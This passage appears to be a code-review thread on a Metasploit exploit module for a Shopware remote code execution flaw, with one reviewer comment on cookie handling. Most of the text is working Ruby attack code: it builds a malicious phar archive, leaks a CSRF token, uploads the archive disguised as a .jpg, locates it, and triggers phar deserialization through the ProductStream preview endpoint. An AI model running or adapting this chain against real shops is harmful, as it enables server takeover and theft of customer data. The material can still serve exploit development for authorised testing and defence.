modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb

```diff
@@ -0,0 +1,262 @@
+    @phar << [file_crc32].pack('V')                # crc32 checksum of un-compressed file contents
+    @phar << [0x1b6].pack('V')                     # bit-mapped file-specific flags
+    @phar << [0x0].pack('V')                       # serialized File Meta-data length
+    @phar << file_contents                         # serialized File Meta-data
+    @phar << [Rex::Text.sha1(@phar)].pack('H*')    # signature
+    @phar << [0x2].pack('V')                       # signiture type
+    @phar << "GBMB"                                # signature presence
+    return
+  end
+
+  def leak_csrf
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'CSRFToken', 'generate'),
+      'headers' => {
+        'Cookie' => @cookie,
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200 && res.headers.include?('X-Csrf-Token')
+      @csrf_token = res.headers['X-Csrf-Token']
+      return
+    end
+    fail_with(Failure::Unknown, "Unable to leak the CSRF token")
+  end
+
+  def upload
+    data = Rex::MIME::Message.new
+    data.add_part(@phar, Rex::Text.rand_text_alpha_lower(8), nil, "name=\"fileId\"; filename=\"#{@phar_bd}.jpg\"")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'backend', 'mediaManager', 'upload'),
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data.to_s,
+      'headers' => {
+        'Cookie' => @cookie,
+        'X-CSRF-Token' => @csrf_token
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200 && res.body =~ /Image is not in a recognized format/i
+      return
+    end
+    fail_with(Failure::Unknown, "Unable to upload phar archive")
+  end
+
+  def leak_upload
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'MediaManager', 'getAlbumMedia'),
+      'headers' => {
+        'Cookie' => @cookie,
+        'X-CSRF-Token' => @csrf_token
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+
+    if res.code == 200 && res.body =~ /#{@phar_bd}.jpg/i
+      bd_path = $1 if res.body =~ /media\\\/image\\\/(.{10})\\\/#{@phar_bd}/
+      @phar_loc = "media/image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg"
+      register_file_for_cleanup("image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg")
+      return
+    end
+    fail_with(Failure::Unknown, "Cannot find phar archive")
+  end
+
+  def trigger_bug
+    sort = {
+      "Shopware_Components_CsvIterator" => {
+        "filename" => "phar://#{@phar_loc}",
+        "delimiter" => "",
+        "header" => ""
+      }
+    }
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),
+      'headers' => {
+        'Cookie' => @cookie,
```

Comment:
`send_request_uri` supports `cookie` as a root level key. This is preferred over setting a cookie via the `headers` key.

Reply:
done.